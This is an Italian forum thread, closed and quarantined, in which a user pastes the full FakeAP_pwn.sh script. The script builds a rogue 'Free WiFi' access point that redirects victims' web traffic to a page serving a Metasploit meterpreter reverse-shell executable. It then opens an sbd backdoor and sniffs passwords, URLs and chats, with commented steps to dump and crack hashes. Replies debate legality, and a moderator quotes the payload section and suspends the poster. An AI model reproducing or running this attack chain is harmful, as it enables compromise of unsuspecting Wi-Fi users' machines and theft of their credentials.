Fake AP

Qui vengono spostati discussioni e messaggi ritenuti inadeguati per il contenuto o la forma con cui sono stati espressi.
Chiusa
Nogravity
Prode Principiante
Messaggi: 70
Iscrizione: sabato 25 aprile 2009, 2:05

Fake AP

Messaggio da Nogravity »

Ciao a tutti, premetto col dire che ho provato a cercare su internet e sui vari forum ma le spiegazioni non sono state soddisfacenti anche perchè l'inglese lo mastico poco. Detto questo volevo chiedere se qualcuno può segnalarmi una guida in italiano su cos'è e come funziona un FakeAP. Oppure se qualcuno può spiegarmi in parole povere come funziona il dhcp3-server.

Posto lo script che ho trovato:

[img]http://#! /bin/bash
# (C)opyright 2009 - g0tmi1k
#
# FakeAP_pwn.sh

# Settings
export  gatewayip=192.168.1.1
export internet_interface=wlan0
export   fakeap_interface=wlan1
echo "[>] Starting: FakeAP_pwn - g0tmi1k"

# FakeAP
echo "[+] Setting up FakeAP"
modprobe tun
xterm -geometry 75x15+1+0 -T FakeAP -e airbase-ng -P -C 30 -e "Free WiFi" $fakeap_interface -v&
sleep 2

# Tables
echo "[+] Setting up forwarding tables..."
ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
#iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE

# DHCP
echo "[+] Setting up DHCP server..."
xterm -geometry 75x25+1+100 -T DHCP -e dhcpd3 -d -f -cf /root/FakeAP_pwn/dhcpd.conf at0&
sleep 2

# Need the user to come here
echo "[+] Start web server..."
#xterm -geometry 75x25+1+200  -T WebServer -e sh -c "start-apache"&
xterm -geometry 75x25+1+200  -T WebServer -e /etc/init.d/apache2 start
sleep 2

# So lets force them!
echo "[+] Force user to vist our site..."
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1

# Bad boy stuff!
echo "[+] Here comes metasploit..."
cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 X > /var/www/MS016455.exe
echo "[+] Uploading SBD..."
xterm -geometry 75x25+1+300 -T Metasploit -e ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 AutoRunScript=/root/FakeAP_pwn/fakeap_pwn.rb E&
sleep 2
# upload //root/FakeAP_pwn/ C:/
# execute -f "C:/sbdbg.exe -q -r 10 -k g0tmi1k -e cmd -p 7332 10.0.0.1"
#./msfconsole -r /root/FakeAP_pwn/fakeap_pwn.rc

# Wait till user is connected
rm -r /tmp/FakeAP_pwn.tmp
echo "[-] Waitng for target to connect..."
while [ ! -e /tmp/FakeAP_pwn.tmp ]; do
sleep 1
done

# They give us access to their system, so lets give them internet back ;)
echo "[+] Give them (our) internet back..."
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
#iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE

# Lets connect! =)
# *** If FakeAP_pwn.rb upload bit is edited, you could replace the line below with VNC! ***
echo "[+] Lets us back in..."
konsole -T BackDoor -e sbd -l -k g0tmi1k -p 7332&
sleep 2

# Get as much info as poss!
echo "[+] Watch what they do..."
# URLs
xterm -geometry 100x10+470+0 -T URLs -e urlsnarf -i wlan0&
# Passwords
xterm -geometry 100x10+470+150 -T Passwords -e dsniff -i wlan0&
# IM Chats
xterm -geometry 100x10+470+300 -T "IM Chat" -e msgsnarf -i wlan0&
echo
echo "[+] DONE - Have you, g0tmi1k?"


# Lets get some stuff from metasploit whistle we are at it!
#sysinfo
#getuid
#use priv
#hashdump > /tmp/FakeAP_pwn-hash.txt
##session -l
##session -i 1

# Lets crack the hash
#cd /pentest/passwords/jtr/
#./john /tmp/FakeAP_pwn-hash.txt[/img]

Prego gli amministratori di chiudere questo post se lo ritengono inadatto alle regole del forum e prego gli utenti del forum di rispondere solo se realmente interessati oppure solo se possono darmi delle indicazioni e suggerimenti; questo per evitare che il prossimo post sia del tipo "Questo è illegale e non si può postare sul forum" dando vita all'eterna lotta tra "buoni" e "cattivi".

Grazie per la collaborazione e grazie a tutti quelli che mi aiuteranno

edit dello staff: il codice è stato oscurato
Ultima modifica di pierba il lunedì 23 novembre 2009, 17:49, modificato 1 volta in totale.
BackBox Linux 2.01 on Acer Aspire One A150
Avatar utente
Italians
Scoppiettante Seguace
Scoppiettante Seguace
Messaggi: 260
Iscrizione: domenica 3 dicembre 2006, 11:30

Re: Fake AP

Messaggio da Italians »

Questo argomento è illegale e non si può postare sul forum
.
Io sostengo    Io Scrivo italiano
Nogravity
Prode Principiante
Messaggi: 70
Iscrizione: sabato 25 aprile 2009, 2:05

Re: Fake AP

Messaggio da Nogravity »

Italians ha scritto:
Questo argomento è illegale e non si può postare sul forum
.
Come parlare con un muro...
BackBox Linux 2.01 on Acer Aspire One A150
Avatar utente
Italians
Scoppiettante Seguace
Scoppiettante Seguace
Messaggi: 260
Iscrizione: domenica 3 dicembre 2006, 11:30

Re: Fake AP

Messaggio da Italians »

markos81 ha scritto: Come parlare con un muro...
Hai letto il Regolamento che hai accettato al momento dell'iscrizione?

Hai letto anche:
5. Argomenti per adulti, violenza, attività illegali. Messaggi contenenti discussioni offensive, violente, sessuali, religiose, immagini vietate, o link a siti con contenuti di questo tipo, verranno modificati, spostati nella sezione "Quarantena", bloccati o cancellati a giudizio dei moderatori. I responsabili potranno essere sospesi, esclusi ed eventualmente denunciati alle autorità competenti.
(yes)
Io sostengo    Io Scrivo italiano
Nogravity
Prode Principiante
Messaggi: 70
Iscrizione: sabato 25 aprile 2009, 2:05

Re: Fake AP

Messaggio da Nogravity »

Si certo che l'ho letto...ora ho una domanda? hai letto il mio primo post?

Codice: Seleziona tutto

Prego gli amministratori di chiudere questo post se lo ritengono inadatto alle regole del forum e prego gli utenti del forum di rispondere solo se realmente interessati oppure solo se possono darmi delle indicazioni e suggerimenti; questo per evitare che il prossimo post sia del tipo "Questo è illegale e non si può postare sul forum" dando vita all'eterna lotta tra "buoni" e "cattivi".

Grazie per la collaborazione e grazie a tutti quelli che mi aiuteranno
Sei un amministratore?

:)
BackBox Linux 2.01 on Acer Aspire One A150
Avatar utente
telperion
Rampante Reduce
Rampante Reduce
Messaggi: 5407
Iscrizione: lunedì 10 luglio 2006, 18:20

Re: Fake AP

Messaggio da telperion »

Da quel che leggo qui
http://blackalchemy.to/project/fakeap/
If one access point is good, 53,000 must be better.

Black Alchemy's Fake AP generates thousands of counterfeit 802.11b access points. Hide in plain sight amongst Fake AP's cacophony of beacon frames. As part of a honeypot or as an instrument of your site security plan, Fake AP confuses Wardrivers, NetStumblers, Script Kiddies, and other undesirables.

Fake AP is a proof of concept released under the GPL.
non mi pare che ci sia nulla di illegale, anzi mi sembra uno strumento di difesa dagli attacchi Wardrivers, NetStumblers, Script Kiddies.
Praticamente il tuo AP vero viene affiancato da un elevato numero di AP fake, e l'eventuale aggressore va in tilt non sapendo quale attaccare.

Altro non ti so dire.

PS:
ti consiglio di ignorare bellamente i post non pertinenti, anzichè innescare sterili diattribe.
;)
Ultima modifica di telperion il lunedì 23 novembre 2009, 11:54, modificato 1 volta in totale.
Avatar utente
Italians
Scoppiettante Seguace
Scoppiettante Seguace
Messaggi: 260
Iscrizione: domenica 3 dicembre 2006, 11:30

Re: Fake AP

Messaggio da Italians »

markos81 ha scritto: Si certo che l'ho letto...ora ho una domanda? hai letto il mio primo post?

Sei un amministratore?
No, ma ciò non mi vieta di dirti che è un argomento illegale. Il fatto che tu abbia scritto:
prego gli utenti del forum di rispondere solo se realmente interessati oppure solo se possono darmi delle indicazioni e suggerimenti; questo per evitare che il prossimo post sia del tipo "Questo è illegale e non si può postare sul forum" dando vita all'eterna lotta tra "buoni" e "cattivi".
non vuol dire che non possa dirti che è illegale, visto che il forum è libero.

Saluti & baci.
Io sostengo    Io Scrivo italiano
Nogravity
Prode Principiante
Messaggi: 70
Iscrizione: sabato 25 aprile 2009, 2:05

Re: Fake AP

Messaggio da Nogravity »

telperion ha scritto: Da quel che leggo qui
http://blackalchemy.to/project/fakeap/

non mi pare che ci sia nulla di illegale, anzi mi sembra uno strumento di difesa dagli attacchi Wardrivers, NetStumblers, Script Kiddies.
Praticamente il tuo AP vero viene affiancato da un elevato numero di AP fake, e l'eventuale aggressore va in tilt non sapendo quale attaccare.

Altro non ti so dire.
@Italians: va bene continua a ritenerlo illegale.

@telperion: Grazie mille per il link...ora gli dò un'occhiata...volevo essere sicuro di una cosa; da quello che ho capito dallo script che ho postato è che vengono modificati i valori di dhcp.conf e di iptables. Ora la mia paura è che una volta lanciato quello script mi si "incasini" la connessione di rete. Scusate magari la domanda stupida.
BackBox Linux 2.01 on Acer Aspire One A150
Avatar utente
telperion
Rampante Reduce
Rampante Reduce
Messaggi: 5407
Iscrizione: lunedì 10 luglio 2006, 18:20

Re: Fake AP

Messaggio da telperion »

markos81 ha scritto:
telperion ha scritto: Da quel che leggo qui
http://blackalchemy.to/project/fakeap/

non mi pare che ci sia nulla di illegale, anzi mi sembra uno strumento di difesa dagli attacchi Wardrivers, NetStumblers, Script Kiddies.
Praticamente il tuo AP vero viene affiancato da un elevato numero di AP fake, e l'eventuale aggressore va in tilt non sapendo quale attaccare.

Altro non ti so dire.
@Italians: va bene continua a ritenerlo illegale.

@telperion: Grazie mille per il link...ora gli dò un'occhiata...volevo essere sicuro di una cosa; da quello che ho capito dallo script che ho postato è che vengono modificati i valori di dhcp.conf e di iptables. Ora la mia paura è che una volta lanciato quello script mi si "incasini" la connessione di rete. Scusate magari la domanda stupida.

copiati il dhcp.conf originale e nel caso lo ripristini.
iptables si resetta da riga di comando.

Poi cosa faccia lo script non te lo so dire, tieni conto che è un prototipo (proof of concept) quindi potrebbe avere parecchi problemi.
Avatar utente
pierba
Tenace Tecnocrate
Tenace Tecnocrate
Messaggi: 14532
Iscrizione: sabato 26 febbraio 2005, 19:10

Re: Fake AP

Messaggio da pierba »

Suggerisco di iniziare da questa lettura, e di cercare in rete con "sicurezza informatica fake AP" senza le virgolette. Trovi diversi risultati.

L'argomento di per se` non e` illegale; ritengo, pero`, che per un utilizzo domestico sia superfluo l'uso di tali forme di sicurezza.

ciao
Pietro pagina personale - Avete domande sul forum? Leggendo le FAQ: potreste trovare la risposta.
La conoscenza deve essere collettiva, quindi, come da regolamento (Sez. II punto 15) i messaggi personali contententi richieste di assistenza tecnica verranno ignorati.
Avatar utente
l3on
Rampante Reduce
Rampante Reduce
Messaggi: 6450
Iscrizione: sabato 20 maggio 2006, 19:03
Località: Bologna
Contatti:

Re: Fake AP

Messaggio da l3on »

@markos81:
Non ci prendiamo in giro...

@telperion:
Non ci prendiamo in giro (2)...

Non c'è niente di male a fare un Fake_AP. È vero.

Ma se a questo si aggiunge un DHCP che "spara" tutti gli utenti connessi su una pagina html che ti costringe ad installare un exe, che magari è un expolit che crea una backdoor SBD sulla macchina attaccante per poi lanciare delle applicazioni di sniffing, beh sì... forse qualcosa di illgale c'è.

Codice: Seleziona tutto

# Bad boy stuff!
echo "[+] Here comes metasploit..."
cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 X > /var/www/MS016455.exe
echo "[+] Uploading SBD..."
xterm -geometry 75x25+1+300 -T Metasploit -e ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 AutoRunScript=/root/FakeAP_pwn/fakeap_pwn.rb E&
sleep 2
markos81:
Una pausa di riflessione di qualche giorno non ti farà certo male. Eri al corrente dell'illegalità dello script postato.


telperion:
A te lascio il beneficio del dubbio, visto che effettivamente hai risposto solo sul Fake_AP. Avevi ragione, ma se provavi solo un po' a leggere lo script ti rendevi conto di dove markos andasse a parare. Insomma, perdonato ma in extremis :).
Ultima modifica di l3on il lunedì 23 novembre 2009, 12:25, modificato 1 volta in totale.
Pagina Personale sul Wiki - Sito Personale - Blog | `l3on @ ubuntu.com` .

Ex "Membro del Consiglio, Sysadmin e Web-Designer dei portali della comunità, Amministratore del Sito e tante altre cose..." Con Ubuntu-it dal maggio del 2006.
Chiusa

Ritorna a “Quarantena”

Chi c’è in linea

Visualizzano questa sezione: 0 utenti iscritti e 5 ospiti